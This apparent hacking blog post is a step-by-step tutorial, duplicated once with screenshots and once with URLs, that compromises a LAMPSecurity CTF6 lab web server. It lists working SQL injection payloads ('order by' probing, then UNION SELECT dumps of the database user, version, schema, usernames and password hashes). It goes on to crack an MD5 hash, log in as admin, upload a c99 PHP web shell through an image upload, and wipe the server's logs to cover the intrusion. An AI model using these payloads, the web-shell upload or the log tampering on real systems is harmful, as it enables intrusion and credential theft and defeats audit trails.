Hi All,
In this tutorial we will be rooting a vulnerable web server using Mantra Security Toolkit.
What all you need
1. Mantra Security Toolkit - Download
2. A vulnerable website. I'm using a modified version of LAMPSecurity CTF6
3. Any PHP Shell you are comfortable with
- Google for "c99 shell"
Now the process
Step 1:
I'm on the home page of the website now
![[Image: mantrahackbar1.jpg]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_sIRqCxCHmzzXIsQmO9_m_jGxNK-cMBhhL4FK-vr6YMwMxkqyJCLVKsB-xPezj4FpYTZRUaoVE8F6K5cMJ6DsSply1icGQK1tKoT5l6ND6Ps56xPIp6mokqspaTGy9E6XFqf7cuSJq6J7FI3A-oPVLMnwBcQLg-YBHw8zUjuff4A2dI=s0-d)
Step 2:
I went through all the pages of web site and found a page with URL input
![[Image: mantrahackbar2.jpg]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_vRVfP-KjrVMX2zwRGHVPRKHOMC3XOayM00czKsh_NZFzbcxUCqhryWeS3fSWdgQ1gvRjbeq_uW6-R6lbO5ijngyjfym6_kxt28s0LNWqC19_P7eAYVWl1O_c0Ejkl1spAZPgrSBFDZ9UTTIyqjqSAytZefQ6_K8DrYMbLZRgUOnSps9Q=s0-d)
Step 3:
I launched Hackbar by pressing F9
![[Image: mantrahackbar3.jpg]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_uUeQ6Xri1KovAHVQyzK_5USfr34zB34Dvi6tD7Pt8XLd5biVm9YlFVCJkA05seo9Ylv-PP7X4p4HMMdzC0PxL9Me2W5g5kjp1yOLobOD0CD8AEAg4QqDFh170rwup6cyqbpfRwHg-VHI2O8E2dHhBqK8crVEHIBsqYKqqPZHghHT_ZbQ=s0-d)
Step 4:
The power of single quote. I'm checking the web site is vulnerable or not by putting a ' at the end of the URL and pressing Execute.
![[Image: mantrahackbar4.jpg]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_sv5f2Q9dSEcKb4HwLV7MejSmd_7pp1xED9lw0oIINOEvC0EHJHLDB6ztkjZ0__RhjfcoSBOfO8tQvWdghoEdHVFgD0p_0J09Sp5bEeSzWpVtaQH62pl5SxePjTyK21aHvvg1ojPtcmrRBFvy9tt4fzDIseILCvgBxoU2m57O2OeWrc-Q=s0-d)
Since the page content is different from the previous one. I can make sure that the web page is vulnerable.
Step 5:
Lets find out the number of tables
![[Image: mantrahackbar6.jpg]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_v9BcurRfX6qBXgD0-w9S-OTSOa88BEpd7LCS3MTk9XIaEMHdpXLD6W-I0f_3Apj5XF1F_5hc5A8bk_4o07F4gGbQXL1eeDsNAc8fEWSso-45aw_6vXwFegA4HY5k8uT5en_qIQsm0K71mFjMrFQysUvTD-jeHhSF3BiXXxffUI2HLXZg=s0-d)
Step 6:
I have to keep on increasing the last number till I see any changes in the page. In usual practice its gonna be a tedious task since there will be hundreds and thousands of tables if not more. But with this tool I can simply press on + button till I see any changes on the webpage
![[Image: mantrahackbar7.jpg]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_sIhIw0f9Urab1xO3fyD9wZt9zioJPOqNld8fQyYPLXE4C-tjx4CfC-dJWqhhdIJRaXSsA2GZpHIcM-zmafjK7W9TVHJpXnrlte_fBbizWoouNAzStI8Tsxw7HtMppYYi07EfWx9xxrHoLWLBuAVlOFzgoXQ-s-1b5EwJa5CZBP6MjI=s0-d)
Step 7:
I went up to 7 and no change till now
![[Image: mantrahackbar12.jpg]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_unPxoLgRdnd7kox10erZZxdaJ0wHFxEQuQb0Z8nd1yeMFgIJ2Qq9v9khRhUzHLIpkQPCdGllvaJ89p3VOwoTm-CSp_oMCZR9lRepmFOsBRaeoAbhxW7CDsbgtX032QPcb-jRQjjRU0P5XszXVjjL7xHVzNLB8_feOpps4FEFmj8K-5foE=s0-d)
Step 8:
I'm on 8 now and I can see the page changed
![[Image: mantrahackbar13.jpg]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_vCk25VYoaEncJi0bSMuCREuhNoQTS60JXUex78xpp2iYrdO5Ca8xtcIknkdUO9uQyle2W9RNgvPxQ2Wnk_vmU6EJgYntEUyUC25h9c4KLg7spBfPNeoMiTkW_VgE-_DHpYkGnMOPSTZP_G5FruqpIivGP6sl_R4QrcJQfHWVNXRd35T18=s0-d)
Step 9:
Now lets go ahead and make a UNION statement. I just went to SQL > UNION SELECT STATEMENT
![[Image: mantrahackbar14.jpg]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_utJnEtuQBGf1Ja8SjoYgPzF_6SBuUSV9TSWR9zCCJ6VKNGb-fnxqI_A7zsCypDqgmDx0YKTZe-3uf-Nl7lUHjBYR94w-TsfuUplj-U9ND-yMErAFj1ARkaV-1TAxR9b27fqgsT8n084eTnvkF4H7IHhMMYr4yqjZTaJojJYNGXRac6BGw=s0-d)
Step 10:
I provided the number of tables. Since I got a different page on table 8, I can make sure that table 8 does not exists and there are only 7 tables
![[Image: mantrahackbar16.jpg]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_vdI3ULpg-T_M03ffPxbjkah1rKEl18fdYslVfREI6t-m5b5mzQt6WWWCSabiR8siDyrPOWa8UbJl1WZVTss4LUGZiDK2jN06N3R1UrSg-uMw90Rmr4t9qaY6LuVd5pxTqC_B-cUk3P1Ht73ED3jO788BIDZRVEqvsWZazuViD7niq7VWY=s0-d)
Step 11:
Wonderful. I can see some numbers on the page now. Those are the vulnerable columns. Lets take the number 2
![[Image: mantrahackbar19.jpg]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_si2vX41pCIQeUtxZRpvesVU4A6AOJQLrjc9vS9FlAh0ZZjZEEZeqWvdwZSJa6rBy4ngdw3uI6qV6uHzpt4OtHp_qreRuVnxqkUPPMhXPV4MKoNYtiDyZPNTcirPX6khgLzPIWezHdHf79N08Mtkxcs-xxp-NAGU_stMKnRTSfB7IB0Bg=s0-d)
Step 12:
I replaced number 2 in URL with another SQL command, it got executed and result is displayed on the page
![[Image: mantrahackbar21.jpg]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_smBnTJNgl-imSw1vAe_vcAOJ1cviVAHPpzYTLu4LOK21MQeMESucxi6eqt3YwOUweIXp6SYnKkf3VAG78j1963hSuPfwITRhEL-OLocILTSSGtY2bU7Gla2wKDtXRQndqxKg0SUJpKjPI9K8WIvCIgLCu7I65jX-X5Vp0fCOb34mPkEJg=s0-d)
The current user is cms_user@localhost
Step 13:
Lets find out the version of the database. I replaced 2 in the URL with version() command
![[Image: mantrahackbar22.jpg]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_uRaP0cyI5w3GRwEsHWWrH-aTHGIBB9lAdh09rK0QJj-j5lihuQNzO5KnqaEQTEnNtfcYux6iNhruFvtXtuc2dwBLyTtzb2DeYbeyGEYCNue4a_Ydpyzs7srxuv0yRD1wRqp_HB1pJrppXRbthMtWy8wkSkuv3FuwEdHLvvQvE_lcMsQcg=s0-d)
5.0.45 is the version
Step 14:
Let me list all the tables
![[Image: mantrahackbar23.jpg]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_tBNz1LSrSY1ZMZNZRCMKFwxBbsElDTgIE7b69SDNGu7e9cOqF2cP0ih3xY6N54s1POowJ8IAAz1K2635ZzvOfz7ovaAOxg_BqtJ38ZaGYVLxlU--wvN-ICnazbdHUFjFhwli6PxuIS8kW8upK6SR4lq07nwLmKN2__QYew1TH6XNKtSQ=s0-d)
From this list I found "user" is an interesting table
Step 15:
Now I listed all the columns and its a big list
![[Image: mantrahackbar24.jpg]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_uawDy_-eio4Owtl2ys2jZvLV1BzwjCYT0LWIEKBrK9DagYxuxNv_fMlRmQe5uN8Lxs7xNaiMaNx3SBPsLPHfRfVgQZ98_2ng9BeL7VnSr1cHsdRubONxwu_F4pV07rEiQG8xxcM3_cbI5aEB2-7Hl6Rbvcrcb0vMxNC0J6XxqL2fdbQg=s0-d)
Step 16:
I want columns from the table "user" and nothing else
![[Image: mantrahackbar25.jpg]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_smkDqtUSCb3xXZcD5JrFL_1tulVLSaV8Rp4pe6Pw0PJkCDjQXIVNtUOWoexFsibpQQ2MS1tPQulU_shHneP3-l2A-V3WNz6M3ZtbWs7umszCsZbIfaMpAnUdmZ7VMYeYeO4ygL4z6M7TfYioqu_KesJOT0eLbHh-MBAbpCPh0DgawErtI=s0-d)
Step 17:
Lets find the user name
![[Image: mantrahackbar27.jpg]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_tTWzbsp7pxXZia-kxtO1cSCk4nSYAHKmEFtlE_QCy6YtD4Zcg8rtKjkc0-vP1Ldpod_UfjflPpevMduzZ1m4hFLhkKUXRBpJmHtkQb8g0WIQaJw66KIcUH6d-IlniP4ih8utv50esMv9HG4W_jc55-9Im-sr14rLHZp5nAocxgX6UY894=s0-d)
Step 18:
Now, what about password
![[Image: mantrahackbar26.jpg]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_vPy747gA7NTeBRNxXoQG6sdFXm3qffhwyANa4TORSTPs-xNfsYfkBcAxjml5VUlBWyGRKNecLDcMPV7j9yyENiiSXuKJd1b1JWhYtmVNx5osFvvY_kRkEDL68jQW8OQs1nKFvEW-bYV75nR7sj7lZ4duVaEjwB_mGozGYrEInqTTseHsI=s0-d)
Its encrypted
Step 19:
Decrypting the password. I copied the MD5 hash, pasted it into hackbar and went to Encryption > MD5 Menu > send to > md5.rednoize.com
![[Image: mantrahackbar30.jpg]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_uwg88rFzc0RO9NhzFa8S_ccSfi1mT--_AYbRHOmA1VnMVJD8OGeRmlzun9dmn4kzDd67rqt6dzQSM4eP_BaQg7f1XOfIqQJIQE6LVHtiMWGsLt0dogEuBYLmu_oTfYzuu7t7vsTB54PsN2bEj5NDsCdw8NuhMhsVC6-RTy2EXHopwBUXY=s0-d)
Step 20:
Voila.!!! I got the password
![[Image: mantrahackbar31.jpg]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_vnginaib4px06W8_toNqjwJKVKtckY4TSbQuizz0VNEBqnRglvUZPRBk4LjDrHJ5PNPmb5phOiUX8o_TW244RAVtXffWx7l7COoUCTihW_592UwnWRn7-hIl_kRVij0JNNiRpo8NitYLkkglbyaSL5h2gUGOc5wTfz3e5sv5MOKowwlew=s0-d)
Step 21:
Finding the log in page. Its was right in front of me
![[Image: mantrahackbar32.jpg]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_siBg1wJ7DukplyivMsSe8n1NgLS04jbA6m0F0eggMkmSScjPw1EvzvcvIf3fVKCcPbi9asIkZA6obXACVt6UWPxMe7A9lw72_FCcKgLVVEmVkqS_XPO1RqcqHoFs7EJZYJTH_fsNPcsBlqtaUcxd62wkFuWmCKx-FnapiZ5rdhBALeTT8=s0-d)
Step 22:
Logging in with the credentials I have
![[Image: mantrahackbar33.jpg]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_tpls58EvDCRfwXTyTLhROSvOZxGho00XDuTvJOusfJOJxw4VLuesNBcp7cLVVocGM9SVuC5X3BimpZQI-ONa61Fa5xKEpAwsCEUTJB2tKGBHQScaC9B18hm8zymHl7OCVSBTGwgdicqaguo4bNU5oDh6lXhG5e4BDDUSI_dTTaQwXCj3E=s0-d)
Step 23:
Greetings.!!!
![[Image: mantrahackbar35.jpg]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_vYrNwpHCNNy2shpqwbGaw1WF3MkBKwq3EIfyNh2_3HYGaPfVcd6mcyZEZm2dQ3fmYUhSEciblLvbG1_43qE9crF5vh6ZK-SZIDKV3Ahga_YHbk8XLKEZ9AhzydeythWAMSBTiAUfsYePQ0LWaJa1Vzyuvkn5CusBe3ef1q6Dz_fomeGPI=s0-d)
Step 24:
I'm an admin now. Look at my powers.
![[Image: mantrahackbar36.jpg]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_urIcGNuWTQOIOBs36GTnLzz3qyC9MFUfVkWkSFcOF4FDbz-s3HAX91_IRi3JlRPC9KhoBFPrd3JU9JBc2mUw5SjF7zVRXT7kMd14YOzNSV9OuXrAFH2oF_pfeKJDIW3ZV7IEP-uABPSywawAazSbVHbAZ4Kiq0TrwM2gzpVHE1VPi3j_M=s0-d)
Step 25:
Let me add an event
![[Image: mantrahackbar37.jpg]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_tcrf8Ipv8zN1Sl08BpWA4J2Lg32-8bMPIM_K7zyAMqtkNUWTQim0avfbkG_W9ND_R8YfVw118h8FW9dQtuZ4cm-t7rejdgQXhlbvK9pIdAGg7VOJq-eM5U1I-MmYxXyqy76W-DNBNr42kX11ufm8EKYLvHAu1XZ2JBOkWSqrLg4HpupA=s0-d)
Step 26:
and of course I want to upload a picture
![[Image: mantrahackbar38.jpg]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_sYRvzi7PkARCakRi4JwH8oO5LpS_bPR9wpr1YeDbeu4QksIEjYWwiz5aApnJnGx39Vr0-ItGojylLSMFd37aHsHna4Yx5Rlw30yfcknvB4VDAhefZdLHOaU74yVfyyV2GO44u6iN6CFxzMMUo4aSL7sUUyc2-LzWHwD63I3HsgTIT4oQ=s0-d)
Step 27:
Lets see it allows me to upload the shell or not
![[Image: mantrahackbar39.jpg]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_vlL3NRBu3-iFP1w49r54_ohsKZX_P05AkPRX5LaxZd8UGADe3pt0fZ7_qvzzMjHVeOl90fb5ZqABhQbvtGolhuEn8lg_UAtH94dzUgsJ_uKFPmyV_aLZ4xC3KqL0adelmvILsiJ2MxrpHpUoiCSme1FdBWBz6ti5B6SvQcqHwsz44FVJo=s0-d)
Step 28:
Now I'm pressing on "Add Event" button
![[Image: mantrahackbar40.jpg]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_uZd_C39DdqURppLZNHD0CLBfScguJD9953SbyDVpxoar3LNPFTEFm1peN8FDTGXiyrXCMgToJDU1iU8ZnRopBBkPLSMtY5T5qOMcIsVtQ3pRGa7QgXLjCMi3OQE5pF1jzlzyHzKunKah9nXOLYZwKN2qQ5oajVynbkUgqrfkwj3htRj-Y=s0-d)
Step 29:
Nice. Looks like it's got uploaded
![[Image: mantrahackbar41.jpg]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_u9zsdxxree9KdEm18oy-Mdos3rxQbkyiptw_pWL3hH6P2t16xWSJeyPlzB6J2Y6-Fcp2uH5_7t2KF_TNGtk2hlQPH-2G2R_aBp-MDz5c7iPSihxlYuLVJjw_tlxd36KIGdM_AG_7ElqoJJ19HeSmTYmSG3nmjHPwjtty6FPXkOkN8K2Q=s0-d)
Step 30:
Let's see where the shell got uploaded to
![[Image: mantrahackbar42.jpg]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_uMaMqiZsn_Pt-Th14eqYAyIu6uGpupPK4HVYlLgECJ_HLUHQasu3ubAWP2rFcCiJexOn2csFBIy-5hyM6BD_u5eKacH3i4esly40lW2DKTaGYgWXkqTl8V-ESzpS02XBKIire28kw7xbsJNgqqP4cCsafWHdwP6C3m3svzfQ6peagRjpg=s0-d)
Step 31:
I'm trying to get the default upload location
![[Image: mantrahackbar43.jpg]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_uDaiErz37IazKo9dtA7Kud0F95esJO8ubLkRMCrbMGbou7yIyu2GcjlbOod59g23XUOEFUmMIDdpO2ybCUUFb_eBKr_huDLKvYtBA6jQ222a8iGZSsAXyK2TCHLfIU7c1net1UCAeyjgCyCn18umyH5zqLsVk9uOxIszrkWzHFrQiCoKs=s0-d)
![[Image: mantrahackbar44.jpg]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_vE3y-Pp7_77IlW1tcU6g7SXQlrZVqmR5CYllqQYrOeksQSZH9JhNbp87NAUwICuBYRGcUQBut6sOC3wFcJ5vTTo0BBAFNd4XAoNXlMjsYZyU3_XBVCdjZkOorNypeTQ710EC4Xwdr3m3gzmxSRtHjfN6EzgBEhjwV7KLeMjdfsaufCPdo=s0-d)
Step 32:
Looks like I got it
![[Image: mantrahackbar45.jpg]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_t-aWFjDEY8hSymvErUCU9uyJAOA3zWzWMKgNGdUAk3XBtUGTFi31F9qQ5po4JnHUS3fEIZRMk_0iB6qlW_3gkWXmcm1ySMZUu3Uy0I8qXKyIfooebFDnjfaJ1mgtPrItYuXiGAORV-LdjOMNvfzzrmmeZrSc09zOAtYgwyiTAYUKHmp3o=s0-d)
Let me click on the c9shell.php file I just uploaded
Step 33:
Voila. I have shell access
![[Image: mantrahackbar46.jpg]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_udCUS2xzTgAk-XS3asHx4oag0_0SNY8T-yBB39BvXkrNbwnpVZ_Z0YeKqdynKlYbo0LcCmYzG5BGw2YIO3xLGMWA4gvUaGjssFaZ-L30kVEOAjO9xZFsnp3CRQz6u7T5rqJTMd8927sm2tQkJA7PozV4Ofexp9ioJspU1rfZwxj3kc1ag=s0-d)
Step 34:
I simply clicked on the up button to get the root folder
![[Image: mantrahackbar48.jpg]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_sL-fubRi2b6mtyVfCuMb8udFDqICBceavKkmekmordlvDtB43ZKvU0u-7AANEw0uCacyohJwClrJfMAkFviyxWkqrc4NwIE8P2FkxnNP5X3E9YM_gvdsVW5auN-P7EgMHxCJdtc0P6swXMSQm-SJ6u7jued-KA5bWLsX_8PzQ9dj8cOks=s0-d)
Now I can do whatever I wish. Deface the website, maintaining access or what ever. But its out of the scope of current tutorial
Step 35:
What I'm interested is the log folder
![[Image: mantrahackbar49.jpg]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_ua4BAF83YBMPaYWQbgzNEey4diIC1BFJJsP5RoF7ukQs61qf4AlzWQi1_4V0_r3g1eDfvCLh_9KTrgdynMNEKhznbn5_jno4Z4YpLoUbG7t0JcWkM1JDter_RVGCuYVnlMmV7cNHimDR7Qc6YwJQYc0NUfkxJEl86ILQaPtJ76QR1rccM=s0-d)
Step 36:
I clicked on the log.log file and it has the logs of my noisy SQL injection attacks
![[Image: mantrahackbar51.jpg]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_t5L-rZ-J6NvlYBU5a7QSEMz4XoAHF3UhBsnm0n6_xVCoglrTepV8jY7E2iNGZMOfxsqEHxZLE2SqsZEJUdRgSwm1T_q6XWg1Jv9v5IAIb-5NT0cwrjE30R6JKMyQ_0a2goPdEpQV9756QzHyiDvSLQHmemkGstekDvtWB3qdEUisv0Nw=s0-d)
Step 37:
Let me go back and edit the log file
![[Image: mantrahackbar52.jpg]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_vyB1x91490IDgF2KUfWnDDk_SarVGzxZFd-6xE8E9xax6t6i2Ez8_qFIoFQM2skKJV4Be33pfysFCot-ur7CZetkxHnBSh2yeOwgK_TbaPALeKb4WX9IamfJ9AYxzqzWYESS1Nd2XhvDkm7Bo3MIKqFhP4pWlcGjjpMRtnneCdpuZBTSw=s0-d)
![[Image: mantrahackbar53.jpg]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_v5Ly4sczvS1j5xXVZeJdcDFHH4PUXfh4sDU1b_UrCrrJKHJQmT--P1Qdag_Z2O-kRAnuEUnRYX7up5AN-11462obkhx_MkEgqRTUsD3hm06BNdsuu2Nf4sXfxyxTYxkPeglykKDUYLLkS1MnkvJWLgJKACbyYrJLsKJY-Po-6C1Uh4BA=s0-d)
Step 38:
I deleted complete log entries. Now saving it.
![[Image: mantrahackbar54.jpg]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_sPY6QaPrpE-7-tY_T71lxPN2eU22gov9-Bbn3OI73W4iS9Ez-gTMdiEHwK21_AGOvOf_9vUFZDM2xIom17jRCjN1YY5DWV-gkOk-e-mNPfO6piouzgOjjcC9Cpr1iFrFXOYN3ltpjCkkaxfyughezHt8YFvSrOZ0ilH0JsQ2zS4wj9zm8=s0-d)
Step 39:
Nice. Log file is empty now
![[Image: mantrahackbar56.jpg]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_uFKtZoSrmlc0u2IjcUb3aD5msN9CM6JknC3mamDmfrdI2L3k22wfGFGyF3-BSyhRa-bPc2QF9gDc2V_DlFItqyfcnnNFXPAAScd44nCYmwtvmU9ks9TEDrQJKsYzYi5rWMZVfUQkAkbHKGRnckPfoAk_-LmfnzK_VU14roWJA-0TxsjZ8=s0-d)
Step 40:
Now. Lets remove the c99 shell by pressing on Self Remove
![[Image: mantrahackbar57.jpg]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_uZ58rjIp0qLpK3vfEYVnwmLSjSVVGUriT2HuzrlVYkd_lBSIE3EyuLxZ-OwcGQMt4nnsqvv8u1NwqouFz9N23Xv7P2MedcL083iJeGh4be_B6zq2Z11HhZ2Dx6cnuJ-QXwUBlj9bJATFsLkBzEmDyEuzzG7cLafUKIPPwgg2pvUirLd1s=s0-d)
Step 41:
Confirmed.!!!
![[Image: mantrahackbar58.jpg]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_udGo_VA78iZ8SoagNREpsD-1hApgnvusvgf-pJbXoSvl7lL6gbF-jje_GvcVXB9Yd-kWK3rRL42ETx9pvDFi-CgM8LOlx-R5vlcAVd3PDurcAEaXs10UQkBCkl9_l0Ebw4aFg2lkHxl0KJHH7oyr0mO1fB18pxfHRX3ZTCFemuckRpwSc=s0-d)
Step 42:
OK. Good Bye C99
![[Image: mantrahackbar59.jpg]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_s-rCyLriCryepBfsTVy2HLD_q51obXj7KDhGs1NCtQBaGK9ZEvdP8ZzvRZ-Ds3KqkQ8Xii1DGzE2kaE5ioWZx1zyrDMXph0C5wo-ZuGfUP8HN2o7jycgnLrMp2e_XrEkvmwEFnjJZwIW_O13PjB4EgBFitjSumKWn3eo05wwRRbDMOPw=s0-d)
Step 43:
Well. It got deleted itself
![[Image: mantrahackbar60.jpg]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_sWMLTu8Gsf2A16ED5IoLWkf6QMAsk85HH1K5VK1cUftBixeJDfyE3IODvDGuz_OxWdnPJ5r9zhkLYYDKo7xrbmaf6T6nGuMF8qGa0bL-mY-l8tWJbpI8J_KGyZi8qlE8GXnwubZMpjmeHNPdim_mfGyQfMguaAlpFKNSJj_nXSKiIXQ9k=s0-d)
In this tutorial we will be rooting a vulnerable web server using Mantra Security Toolkit.
What all you need
1. Mantra Security Toolkit - Download
2. A vulnerable website. I'm using a modified version of LAMPSecurity CTF6
3. Any PHP Shell you are comfortable with
- Google for "c99 shell"
Now the process
Step 1:
I'm on the home page of the website now
http://192.168.132.128/
Step 2:
I went through all the pages of web site and found a page with URL input
http://192.168.132.128/?id=13
Step 3:
I launched Hackbar by pressing F9
Step 4:
The power of single quote. I'm checking the web site is vulnerable or not by putting a ' at the end of the URL and pressing Execute.
http://192.168.132.128/?id=13'Since the page content is different from the previous one. I can make sure that the web page is vulnerable.
Step 5:
Lets find out the number of tables
http://192.168.132.128/?id=13 order by 1Step 6:
I have to keep on increasing the last number till I see any changes in the page. In usual practice its gonna be a tedious task since there will be hundreds and thousands of tables if not more. But with this tool I can simply press on + button till I see any changes on the webpage
http://192.168.132.128/?id=13 order by 7Step 7:
I went up to 7 and no change till now
http://192.168.132.128/?id=13 order by 7Step 8:
I'm on 8 now and I can see the page changed
http://192.168.132.128/?id=13 order by 8Step 9:
Now lets go ahead and make a UNION statement. I just went to SQL > UNION SELECT STATEMENT
Step 10:
I provided the number of tables. Since I got a different page on table 8, I can make sure that table 8 does not exists and there are only 7 tables
Step 11:
Wonderful. I can see some numbers on the page now. Those are the vulnerable columns. Lets take the number 2
http://192.168.132.128/?id=13 UNION SELECT 1,2,3,4,5,6,7Step 12:
I replaced number 2 in URL with another SQL command, it got executed and result is displayed on the page
http://192.168.132.128/?id=13 UNION SELECT 1,user(),3,4,5,6,7The current user is cms_user@localhost
Step 13:
Lets find out the version of the database. I replaced 2 in the URL with version() command
http://192.168.132.128/?id=13 UNION SELECT 1,version(),3,4,5,6,75.0.45 is the version
Step 14:
Let me list all the tables
http://192.168.132.128/?id=13 UNION SELECT 1,table_name,3,4,5,6,7 from information_schema.tablesFrom this list I found "user" is an interesting table
Step 15:
Now I listed all the columns and its a big list
http://192.168.132.128/?id=13 UNION SELECT 1,column_name,3,4,5,6,7 from information_schema.columnsStep 16:
I want columns from the table "user" and nothing else
http://192.168.132.128/?id=13 UNION SELECT 1,column_name,3,4,5,6,7 from information_schema.columns where table_name='user'Step 17:
Lets find the user name
http://192.168.132.128/?id=13 UNION SELECT 1,user_username,3,4,5,6,7 from userStep 18:
Now, what about password
http://192.168.132.128/?id=13 UNION SELECT 1,user_password,3,4,5,6,7 from userIts encrypted
Step 19:
Decrypting the password. I copied the MD5 hash, pasted it into hackbar and went to Encryption > MD5 Menu > send to > md5.rednoize.com
Step 20:
Voila.!!! I got the password
Step 21:
Finding the log in page. Its was right in front of me
Step 22:
Logging in with the credentials I have
Step 23:
Greetings.!!!
Step 24:
I'm an admin now. Look at my powers.
Step 25:
Let me add an event
Step 26:
and of course I want to upload a picture
Step 27:
Lets see it allows me to upload the shell or not
Step 28:
Now I'm pressing on "Add Event" button
Step 29:
Nice. Looks like it's got uploaded
Step 30:
Let's see where the shell got uploaded to
Step 31:
I'm trying to get the default upload location
Step 32:
Looks like I got it
Let me click on the c9shell.php file I just uploaded
Step 33:
Voila. I have shell access
Step 34:
I simply clicked on the up button to get the root folder
Now I can do whatever I wish. Deface the website, maintaining access or what ever. But its out of the scope of current tutorial
Step 35:
What I'm interested is the log folder
Step 36:
I clicked on the log.log file and it has the logs of my noisy SQL injection attacks
Step 37:
Let me go back and edit the log file
Step 38:
I deleted complete log entries. Now saving it.
Step 39:
Nice. Log file is empty now
Step 40:
Now. Lets remove the c99 shell by pressing on Self Remove
Step 41:
Confirmed.!!!
Step 42:
OK. Good Bye C99
Step 43:
Well. It got deleted itself
H4qqy H4ck!ng
This comment has been removed by a blog administrator.
ReplyDeleteHmmmok Nice share
ReplyDelete